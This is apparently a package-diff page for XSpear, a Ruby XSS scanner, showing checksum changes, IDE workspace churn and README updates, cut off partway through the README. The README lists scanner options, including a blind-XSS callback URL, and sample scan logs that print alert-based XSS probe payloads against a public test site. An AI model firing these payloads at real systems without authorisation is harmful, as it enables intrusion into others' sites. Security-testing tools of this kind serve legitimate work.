XSpear 1.2.3 → 1.3.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (10) hide show
  1. checksums.yaml +4 -4
  2. data/.idea/workspace.xml +165 -119
  3. data/README.md +211 -44
  4. data/XSpear.gemspec +2 -0
  5. data/config.json +9 -0
  6. data/exe/XSpear +25 -12
  7. data/lib/XSpear/log.rb +10 -1
  8. data/lib/XSpear/version.rb +1 -1
  9. data/lib/XSpear.rb +58 -20
  10. metadata +31 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: e424021e52b442bddc6cd364b9c5cb6a59e70490d68b06ac08c804e2d05ffeae
4
- data.tar.gz: ec290b0fd740ea40235cec72ed97912edbca7e2851a56b689ed85b2f46c2cbba
3
+ metadata.gz: 3a4ad44a0682af3bee97123748084c84a9e99173dd54a4c3cb6b7987ff2a5849
4
+ data.tar.gz: f8f3fc5a8ea264728dcd49d3257d6abcee7bd2e06b91b651aa8ebcd5ff21dcd0
5
5
  SHA512:
6
- metadata.gz: bd758a2fe9745c9d028b7b3cd97360340fc0a390e4b15690bd310972b2b711d2b2a28cf60cab3c573b697daf5a3524c627aad20e5f3545f44e395dd9f1b3dc2d
7
- data.tar.gz: '024388dfb74f53d07cbc7e1891799211138d30ee646579449e3bef63590b3e2f1017381dfcaeb4cd12da8bd0498095db19d7a8c3903d0e3cf3898f373cf741fe'
6
+ metadata.gz: ae4acb32ea4ba0951bf4a52b6cb89bc14187a834603bd973440252a64bbdeb0beecb74003518e79feb903601d6f81af5de4fc9f88aa799791a6ae008d04f2744
7
+ data.tar.gz: d192f703cb73d0e2cdd1d6a9a815d48961c0b5576659331842de7110755cec9b2d494d71fba235d8ab8b844f6f32ef413cb719a89f77574933d784ccfab07d4a
data/.idea/workspace.xml CHANGED
@@ -3,7 +3,8 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/XSpear-1.2.2.gem" beforeDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
7
+ <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
7
8
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
9
  <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
9
10
  </list>
@@ -21,31 +22,29 @@
21
22
  <file pinned="false" current-in-tab="false">
22
23
  <entry file="file://$PROJECT_DIR$/exe/XSpear">
23
24
  <provider selected="true" editor-type-id="text-editor">
24
- <state relative-caret-position="-1138">
25
- <caret line="28" column="34" selection-start-line="28" selection-start-column="34" selection-end-line="28" selection-end-column="34" />
25
+ <state relative-caret-position="489">
26
+ <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
26
27
  </state>
27
28
  </provider>
28
29
  </entry>
29
30
  </file>
30
31
  <file pinned="false" current-in-tab="false">
31
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
32
- <provider selected="true" editor-type-id="text-editor">
33
- <state relative-caret-position="331">
34
- <caret line="666" column="13" lean-forward="true" selection-start-line="666" selection-start-column="13" selection-end-line="666" selection-end-column="13" />
32
+ <entry file="file://$PROJECT_DIR$/README.md">
33
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
34
+ <state split_layout="SPLIT">
35
+ <first_editor relative-caret-position="6480">
36
+ <caret line="432" column="38" lean-forward="true" selection-start-line="432" selection-start-column="38" selection-end-line="432" selection-end-column="38" />
37
+ </first_editor>
38
+ <second_editor />
35
39
  </state>
36
40
  </provider>
37
41
  </entry>
38
42
  </file>
39
43
  <file pinned="false" current-in-tab="false">
40
- <entry file="file://$PROJECT_DIR$/bin/console">
41
- <provider selected="true" editor-type-id="text-editor" />
42
- </entry>
43
- </file>
44
- <file pinned="false" current-in-tab="false">
45
- <entry file="file://$USER_HOME$/.rvm/rubies/ruby-2.4.6/lib/ruby/site_ruby/2.4.0/rubygems/core_ext/kernel_require.rb">
44
+ <entry file="file://$PROJECT_DIR$/config.json">
46
45
  <provider selected="true" editor-type-id="text-editor">
47
- <state relative-caret-position="795">
48
- <caret line="53" selection-start-line="53" selection-end-line="53" />
46
+ <state relative-caret-position="105">
47
+ <caret line="7" column="13" selection-end-line="8" selection-end-column="1" />
49
48
  </state>
50
49
  </provider>
51
50
  </entry>
@@ -53,47 +52,60 @@
53
52
  <file pinned="false" current-in-tab="false">
54
53
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
55
54
  <provider selected="true" editor-type-id="text-editor">
56
- <state relative-caret-position="1095">
55
+ <state relative-caret-position="28">
57
56
  <caret line="73" selection-start-line="73" selection-end-line="73" />
58
57
  </state>
59
58
  </provider>
60
59
  </entry>
61
60
  </file>
62
- <file pinned="false" current-in-tab="false">
63
- <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
61
+ <file pinned="false" current-in-tab="true">
62
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
64
63
  <provider selected="true" editor-type-id="text-editor">
65
- <state relative-caret-position="225">
66
- <caret line="15" column="28" selection-start-line="15" selection-start-column="28" selection-end-line="15" selection-end-column="28" />
64
+ <state relative-caret-position="325">
65
+ <caret line="183" column="6" selection-start-line="183" selection-start-column="6" selection-end-line="183" selection-end-column="6" />
67
66
  </state>
68
67
  </provider>
69
68
  </entry>
70
69
  </file>
71
- <file pinned="false" current-in-tab="true">
72
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
70
+ <file pinned="false" current-in-tab="false">
71
+ <entry file="file://$PROJECT_DIR$/bin/console">
72
+ <provider selected="true" editor-type-id="text-editor" />
73
+ </entry>
74
+ </file>
75
+ <file pinned="false" current-in-tab="false">
76
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
73
77
  <provider selected="true" editor-type-id="text-editor">
74
- <state relative-caret-position="15">
75
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
78
+ <state relative-caret-position="195">
79
+ <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
76
80
  </state>
77
81
  </provider>
78
82
  </entry>
79
83
  </file>
80
84
  <file pinned="false" current-in-tab="false">
81
- <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
85
+ <entry file="file://$APPLICATION_HOME_DIR$/rubystubs23/string.rb">
82
86
  <provider selected="true" editor-type-id="text-editor">
83
- <state relative-caret-position="105">
84
- <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
87
+ <state relative-caret-position="237">
88
+ <caret line="302" column="6" selection-start-line="302" selection-start-column="6" selection-end-line="302" selection-end-column="6" />
85
89
  </state>
86
90
  </provider>
87
91
  </entry>
88
92
  </file>
89
93
  <file pinned="false" current-in-tab="false">
90
- <entry file="file://$PROJECT_DIR$/Rakefile">
91
- <provider selected="true" editor-type-id="text-editor" />
94
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
95
+ <provider selected="true" editor-type-id="text-editor">
96
+ <state relative-caret-position="15">
97
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
98
+ </state>
99
+ </provider>
92
100
  </entry>
93
101
  </file>
94
102
  <file pinned="false" current-in-tab="false">
95
- <entry file="file:///usr/local/bin/rake">
96
- <provider selected="true" editor-type-id="text-editor" />
103
+ <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
104
+ <provider selected="true" editor-type-id="text-editor">
105
+ <state relative-caret-position="480">
106
+ <caret line="44" column="47" selection-start-line="44" selection-start-column="35" selection-end-line="44" selection-end-column="47" />
107
+ </state>
108
+ </provider>
97
109
  </entry>
98
110
  </file>
99
111
  </leaf>
@@ -103,6 +115,15 @@
103
115
  <find>BLINDNOTDETECTED</find>
104
116
  <find>@all</find>
105
117
  <find>@reflected_params</find>
118
+ <find>@thread</find>
119
+ <find>thread</find>
120
+ <find>STATIC</find>
121
+ <find>@progress</find>
122
+ <find>@progre</find>
123
+ <find>@verbose</find>
124
+ <find>puts</find>
125
+ <find>not fil</find>
126
+ <find>EH</find>
106
127
  </findStrings>
107
128
  </component>
108
129
  <component name="Git.Settings">
@@ -111,22 +132,23 @@
111
132
  <component name="IdeDocumentHistory">
112
133
  <option name="CHANGED_PATHS">
113
134
  <list>
114
- <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
115
- <option value="$PROJECT_DIR$/XSpear.gemspec" />
116
135
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
117
136
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
118
- <option value="$PROJECT_DIR$/README.md" />
137
+ <option value="$PROJECT_DIR$/config.json" />
138
+ <option value="$PROJECT_DIR$/XSpear.gemspec" />
139
+ <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
119
140
  <option value="$PROJECT_DIR$/exe/XSpear" />
120
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
121
141
  <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
142
+ <option value="$PROJECT_DIR$/README.md" />
143
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
122
144
  </list>
123
145
  </option>
124
146
  </component>
125
- <component name="ProjectFrameBounds" extendedState="6" fullScreen="true">
126
- <option name="x" value="-1920" />
127
- <option name="y" value="-643" />
128
- <option name="width" value="1920" />
129
- <option name="height" value="1080" />
147
+ <component name="ProjectFrameBounds" extendedState="6">
148
+ <option name="x" value="-1879" />
149
+ <option name="y" value="-620" />
150
+ <option name="width" value="1036" />
151
+ <option name="height" value="1057" />
130
152
  </component>
131
153
  <component name="ProjectLevelVcsManager" settingsEditedManually="true">
132
154
  <ConfirmationsSetting value="2" id="Add" />
@@ -237,42 +259,7 @@
237
259
  <workItem from="1564151699165" duration="2494000" />
238
260
  <workItem from="1564413097342" duration="11274000" />
239
261
  <workItem from="1574090247432" duration="1799000" />
240
- <workItem from="1577115206395" duration="3266000" />
241
- </task>
242
- <task id="LOCAL-00017" summary="1.0.0 Final commit">
243
- <created>1563553596470</created>
244
- <option name="number" value="00017" />
245
- <option name="presentableId" value="LOCAL-00017" />
246
- <option name="project" value="LOCAL" />
247
- <updated>1563553596470</updated>
248
- </task>
249
- <task id="LOCAL-00018" summary="Edit readme">
250
- <created>1563554102958</created>
251
- <option name="number" value="00018" />
252
- <option name="presentableId" value="LOCAL-00018" />
253
- <option name="project" value="LOCAL" />
254
- <updated>1563554102958</updated>
255
- </task>
256
- <task id="LOCAL-00019" summary="modify dependency rspec">
257
- <created>1563555157935</created>
258
- <option name="number" value="00019" />
259
- <option name="presentableId" value="LOCAL-00019" />
260
- <option name="project" value="LOCAL" />
261
- <updated>1563555157935</updated>
262
- </task>
263
- <task id="LOCAL-00020" summary="modify dependency rspec">
264
- <created>1563555198677</created>
265
- <option name="number" value="00020" />
266
- <option name="presentableId" value="LOCAL-00020" />
267
- <option name="project" value="LOCAL" />
268
- <updated>1563555198677</updated>
269
- </task>
270
- <task id="LOCAL-00021" summary="modify dependency rspec">
271
- <created>1563638920975</created>
272
- <option name="number" value="00021" />
273
- <option name="presentableId" value="LOCAL-00021" />
274
- <option name="project" value="LOCAL" />
275
- <updated>1563638920975</updated>
262
+ <workItem from="1577115206395" duration="20463000" />
276
263
  </task>
277
264
  <task id="LOCAL-00022" summary="Change Badge(version)">
278
265
  <created>1563639231885</created>
@@ -582,11 +569,46 @@
582
569
  <option name="project" value="LOCAL" />
583
570
  <updated>1577118338926</updated>
584
571
  </task>
585
- <option name="localTasksCounter" value="66" />
572
+ <task id="LOCAL-00066" summary="(1.2.3) Bug fix #35">
573
+ <created>1577118594609</created>
574
+ <option name="number" value="00066" />
575
+ <option name="presentableId" value="LOCAL-00066" />
576
+ <option name="project" value="LOCAL" />
577
+ <updated>1577118594609</updated>
578
+ </task>
579
+ <task id="LOCAL-00067" summary="(1.3) fixed #38 (Added path scan)">
580
+ <created>1577596645830</created>
581
+ <option name="number" value="00067" />
582
+ <option name="presentableId" value="LOCAL-00067" />
583
+ <option name="project" value="LOCAL" />
584
+ <updated>1577596645830</updated>
585
+ </task>
586
+ <task id="LOCAL-00068" summary="(1.3) fixed #39 (Added inJS scan)">
587
+ <created>1577597049653</created>
588
+ <option name="number" value="00068" />
589
+ <option name="presentableId" value="LOCAL-00068" />
590
+ <option name="project" value="LOCAL" />
591
+ <updated>1577597049653</updated>
592
+ </task>
593
+ <task id="LOCAL-00069" summary="(1.3) fixed #37 (Added -c --config options)">
594
+ <created>1577612095200</created>
595
+ <option name="number" value="00069" />
596
+ <option name="presentableId" value="LOCAL-00069" />
597
+ <option name="project" value="LOCAL" />
598
+ <updated>1577612095200</updated>
599
+ </task>
600
+ <task id="LOCAL-00070" summary="(1.3) fixed #40 (Reformating Logs / Verbose 0~4)">
601
+ <created>1577626433478</created>
602
+ <option name="number" value="00070" />
603
+ <option name="presentableId" value="LOCAL-00070" />
604
+ <option name="project" value="LOCAL" />
605
+ <updated>1577626433478</updated>
606
+ </task>
607
+ <option name="localTasksCounter" value="71" />
586
608
  <servers />
587
609
  </component>
588
610
  <component name="TimeTrackingManager">
589
- <option name="totallyTimeSpent" value="55309000" />
611
+ <option name="totallyTimeSpent" value="72506000" />
590
612
  </component>
591
613
  <component name="TodoView">
592
614
  <todo-panel id="selected-file">
@@ -598,10 +620,10 @@
598
620
  </todo-panel>
599
621
  </component>
600
622
  <component name="ToolWindowManager">
601
- <frame x="-1920" y="-643" width="1920" height="1080" extended-state="6" />
623
+ <frame x="-1879" y="-620" width="1879" height="1057" extended-state="6" />
602
624
  <editor active="true" />
603
625
  <layout>
604
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13045794" />
626
+ <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13336962" />
605
627
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
606
628
  <window_info id="Favorites" order="2" side_tool="true" />
607
629
  <window_info anchor="bottom" id="Message" order="0" />
@@ -614,9 +636,9 @@
614
636
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
615
637
  <window_info anchor="bottom" id="Database Changes" order="8" />
616
638
  <window_info anchor="bottom" id="Version Control" order="9" />
617
- <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.32970297" />
639
+ <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.2373057" />
618
640
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
619
- <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
641
+ <window_info anchor="bottom" id="Messages" order="12" weight="0.32857144" />
620
642
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
621
643
  <window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
622
644
  <window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
@@ -627,11 +649,6 @@
627
649
  <option name="version" value="1" />
628
650
  </component>
629
651
  <component name="VcsManagerConfiguration">
630
- <MESSAGE value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
631
- <MESSAGE value="(1.0.8) Add event handler &amp; html5 XSS code, new pattern" />
632
- <MESSAGE value="(1.0.8) Releases 1.0.8" />
633
- <MESSAGE value="(1.0.9)[Fixed #11] Add check 'useful code'" />
634
- <MESSAGE value="(1.0.9)[Fixed #12] Modify XSpear Struct(option.* =&gt; options [hash])" />
635
652
  <MESSAGE value="(1.0.9)[Fixed #10] Add raw file read options" />
636
653
  <MESSAGE value="(1.0.9)[Fixed #13] Remove add pattern from StandardError in 'makeQueryPattern'" />
637
654
  <MESSAGE value="(1.0.9) Releases 1.0.9 / Add --raw options, code refactoring, fixed bugs" />
@@ -652,7 +669,12 @@
652
669
  <MESSAGE value="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)" />
653
670
  <MESSAGE value="(1.2.1) Added ''-a(--test-all-params)' mode(#27) and bug fix(#34)" />
654
671
  <MESSAGE value="(1.2.2) Remove Debug Code" />
655
- <option name="LAST_COMMIT_MESSAGE" value="(1.2.2) Remove Debug Code" />
672
+ <MESSAGE value="(1.2.3) Bug fix #35" />
673
+ <MESSAGE value="(1.3) fixed #38 (Added path scan)" />
674
+ <MESSAGE value="(1.3) fixed #39 (Added inJS scan)" />
675
+ <MESSAGE value="(1.3) fixed #37 (Added -c --config options)" />
676
+ <MESSAGE value="(1.3) fixed #40 (Reformating Logs / Verbose 0~4)" />
677
+ <option name="LAST_COMMIT_MESSAGE" value="(1.3) fixed #40 (Reformating Logs / Verbose 0~4)" />
656
678
  </component>
657
679
  <component name="editorHistoryManager">
658
680
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -675,16 +697,6 @@
675
697
  </state>
676
698
  </provider>
677
699
  </entry>
678
- <entry file="file://$PROJECT_DIR$/README.md">
679
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
680
- <state split_layout="SPLIT">
681
- <first_editor relative-caret-position="180">
682
- <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
683
- </first_editor>
684
- <second_editor />
685
- </state>
686
- </provider>
687
- </entry>
688
700
  <entry file="file://$USER_HOME$/.rvm/rubies/ruby-2.4.6/lib/ruby/site_ruby/2.4.0/rubygems/core_ext/kernel_require.rb">
689
701
  <provider selected="true" editor-type-id="text-editor">
690
702
  <state relative-caret-position="795">
@@ -692,30 +704,47 @@
692
704
  </state>
693
705
  </provider>
694
706
  </entry>
695
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
707
+ <entry file="file://$PROJECT_DIR$/Rakefile">
708
+ <provider selected="true" editor-type-id="text-editor" />
709
+ </entry>
710
+ <entry file="file:///usr/local/bin/rake">
711
+ <provider selected="true" editor-type-id="text-editor" />
712
+ </entry>
713
+ <entry file="file://$PROJECT_DIR$/Gemfile">
714
+ <provider selected="true" editor-type-id="text-editor" />
715
+ </entry>
716
+ <entry file="file://$PROJECT_DIR$/config.json">
696
717
  <provider selected="true" editor-type-id="text-editor">
697
- <state relative-caret-position="1095">
698
- <caret line="73" selection-start-line="73" selection-end-line="73" />
718
+ <state relative-caret-position="105">
719
+ <caret line="7" column="13" selection-end-line="8" selection-end-column="1" />
699
720
  </state>
700
721
  </provider>
701
722
  </entry>
702
- <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
723
+ <entry file="file://$APPLICATION_HOME_DIR$/rubystubs23/string.rb">
703
724
  <provider selected="true" editor-type-id="text-editor">
704
- <state relative-caret-position="105">
705
- <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
725
+ <state relative-caret-position="237">
726
+ <caret line="302" column="6" selection-start-line="302" selection-start-column="6" selection-end-line="302" selection-end-column="6" />
706
727
  </state>
707
728
  </provider>
708
729
  </entry>
709
- <entry file="file://$PROJECT_DIR$/Rakefile">
710
- <provider selected="true" editor-type-id="text-editor" />
711
- </entry>
712
- <entry file="file:///usr/local/bin/rake">
713
- <provider selected="true" editor-type-id="text-editor" />
730
+ <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/options-2.3.2/lib/options.rb">
731
+ <provider selected="true" editor-type-id="text-editor">
732
+ <state relative-caret-position="15">
733
+ <caret line="1" column="21" selection-start-line="1" selection-start-column="21" selection-end-line="1" selection-end-column="21" />
734
+ </state>
735
+ </provider>
714
736
  </entry>
715
737
  <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
716
738
  <provider selected="true" editor-type-id="text-editor">
717
- <state relative-caret-position="225">
718
- <caret line="15" column="28" selection-start-line="15" selection-start-column="28" selection-end-line="15" selection-end-column="28" />
739
+ <state relative-caret-position="195">
740
+ <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
741
+ </state>
742
+ </provider>
743
+ </entry>
744
+ <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
745
+ <provider selected="true" editor-type-id="text-editor">
746
+ <state relative-caret-position="480">
747
+ <caret line="44" column="47" selection-start-line="44" selection-start-column="35" selection-end-line="44" selection-end-column="47" />
719
748
  </state>
720
749
  </provider>
721
750
  </entry>
@@ -724,22 +753,39 @@
724
753
  </entry>
725
754
  <entry file="file://$PROJECT_DIR$/exe/XSpear">
726
755
  <provider selected="true" editor-type-id="text-editor">
727
- <state relative-caret-position="-1138">
728
- <caret line="28" column="34" selection-start-line="28" selection-start-column="34" selection-end-line="28" selection-end-column="34" />
756
+ <state relative-caret-position="489">
757
+ <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
729
758
  </state>
730
759
  </provider>
731
760
  </entry>
732
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
761
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
733
762
  <provider selected="true" editor-type-id="text-editor">
734
- <state relative-caret-position="331">
735
- <caret line="666" column="13" lean-forward="true" selection-start-line="666" selection-start-column="13" selection-end-line="666" selection-end-column="13" />
763
+ <state relative-caret-position="15">
764
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
736
765
  </state>
737
766
  </provider>
738
767
  </entry>
739
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
768
+ <entry file="file://$PROJECT_DIR$/README.md">
769
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
770
+ <state split_layout="SPLIT">
771
+ <first_editor relative-caret-position="6480">
772
+ <caret line="432" column="38" lean-forward="true" selection-start-line="432" selection-start-column="38" selection-end-line="432" selection-end-column="38" />
773
+ </first_editor>
774
+ <second_editor />
775
+ </state>
776
+ </provider>
777
+ </entry>
778
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
740
779
  <provider selected="true" editor-type-id="text-editor">
741
- <state relative-caret-position="15">
742
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
780
+ <state relative-caret-position="28">
781
+ <caret line="73" selection-start-line="73" selection-end-line="73" />
782
+ </state>
783
+ </provider>
784
+ </entry>
785
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
786
+ <provider selected="true" editor-type-id="text-editor">
787
+ <state relative-caret-position="325">
788
+ <caret line="183" column="6" selection-start-line="183" selection-start-column="6" selection-end-line="183" selection-end-column="6" />
743
789
  </state>
744
790
  </provider>
745
791
  </entry>
data/README.md CHANGED
@@ -8,22 +8,29 @@ XSpear is XSS Scanner on ruby gems
8
8
  ## Key features
9
9
  - Pattern matching based XSS scanning
10
10
  - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
11
- - Testing request/response for XSS protection bypass and reflected params<br>
11
+ - Testing request/response for XSS protection bypass and reflected(or all) params<br>
12
12
  + Reflected Params
13
+ + All params(for blind xss, anytings)
13
14
  + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
14
15
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
15
16
  - Dynamic/Static Analysis
16
17
  + Find SQL Error pattern
17
18
  + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
18
19
  + Analysis Other headers..(Server version, Content-Type, etc...)
20
+ + XSS Testing to URI Path
19
21
  - Scanning from Raw file(Burp suite, ZAP Request)
20
22
  - XSpear running on ruby code(with Gem library)
21
23
  - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
22
24
  - Testing at selected parameters
23
25
  - Support output format `cli` `json`
24
26
  + cli: summary, filtered rule(params), Raw Query
25
- - Support Verbose level (quit / nomal / raw data)
27
+ - Support Verbose level (0~3)
28
+ + 0: quite mode(only result)
29
+ + 1: show scanning status(default)
30
+ + 2: show scanning logs
31
+ + 3: show detail log(req/res)
26
32
  - Support custom callback code to any test various attack vectors
33
+ - Support Config file
27
34
 
28
35
  ## Installation
29
36
 
@@ -53,6 +60,7 @@ If you configured it to install automatically in the Gem library, but it behaves
53
60
  $ gem install colorize
54
61
  $ gem install selenium-webdriver
55
62
  $ gem install terminal-table
63
+ $ gem install progress_bar
56
64
  ```
57
65
 
58
66
  ## Usage on cli
@@ -60,11 +68,13 @@ $ gem install terminal-table
60
68
  ```
61
69
  Usage: xspear -u [target] -[options] [value]
62
70
  [ e.g ]
63
- $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
71
+ $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
72
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
64
73
 
65
74
  [ Options ]
66
75
  -u, --url=target_URL [required] Target Url
67
76
  -d, --data=POST Body [optional] POST Method Body data
77
+ -a, --test-all-params [optional] test to all params(include not reflected)
68
78
  --headers=HEADERS [optional] Add HTTP Headers
69
79
  --cookie=COOKIE [optional] Add Cookie
70
80
  --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)
@@ -73,11 +83,12 @@ $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
73
83
  + with XSS Hunter, ezXSS, HBXSS, etc...
74
84
  + e.g : -b https://hahwul.xss.ht
75
85
  -t, --threads=NUMBER [optional] thread , default: 10
76
- -o, --output=FILENAME [optional] Save JSON Result
77
- -v, --verbose=1~3 [optional] Show log depth
78
- + Default value: 2
79
- + v=1 : quite mode
80
- + v=2 : show scanning log
86
+ -o, --output=FORMAT [optional] Output format (cli , json)
87
+ -c, --config=FILENAME [optional] Using config.json
88
+ -v, --verbose=0~3 [optional] Show log depth
89
+ + v=0 : quite mode(only result)
90
+ + v=1 : show scanning status(default)
91
+ + v=2 : show scanning logs
81
92
  + v=3 : show detail log(req/res)
82
93
  -h, --help Prints this help
83
94
  --version Show XSpear version
@@ -91,40 +102,218 @@ $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
91
102
  - (M)EDIUM: medium level issue
92
103
  - (H)IGH: high level issue
93
104
 
105
+ ### Verbose Mode
106
+ **[0] quite mode(show only result)**
107
+ ```
108
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
109
+ you see report
110
+ ```
111
+ **[1] show progress bar (default)**
112
+ ```
113
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
114
+ [*] analysis request..
115
+ [*] used test-reflected-params mode(default)
116
+ [*] creating a test query [for reflected 2 param + blind XSS ]
117
+ [*] test query generation is complete. [249 query]
118
+ [*] starting XSS Scanning. [10 threads]
119
+
120
+ [#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s]
121
+ ...
122
+ you see report
123
+ ```
124
+ **[2] show scanning logs**
125
+ ```
126
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
127
+ [*] analysis request..
128
+ [I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
129
+ [-] [22:42:41] [200/OK] 'STATIC' not reflected
130
+ [-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
131
+ [I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
132
+ [*] used test-reflected-params mode(default)
133
+ [*] creating a test query [for reflected 2 param + blind XSS ]
134
+ [*] test query generation is complete. [249 query]
135
+ [*] starting XSS Scanning. [10 threads]
136
+ [I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
137
+ [-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
138
+ [-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
139
+ [H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
140
+ [V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
141
+ ...
142
+ you see report
143
+ ```
144
+ **[3] show scanning detail logs**
145
+ ```
146
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
147
+ [*] analysis request..
148
+ [-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
149
+ [ Request ]
150
+ {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
151
+ [ Response ]
152
+ {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
153
+ [-] [22:56:21] [200/OK] 'STATIC' not reflected
154
+ [-] [22:56:21] [200/OK] cat=123rEfe6 in url
155
+ ...
156
+ [*] used test-reflected-params mode(default)
157
+ [*] creating a test query [for reflected 2 param + blind XSS ]
158
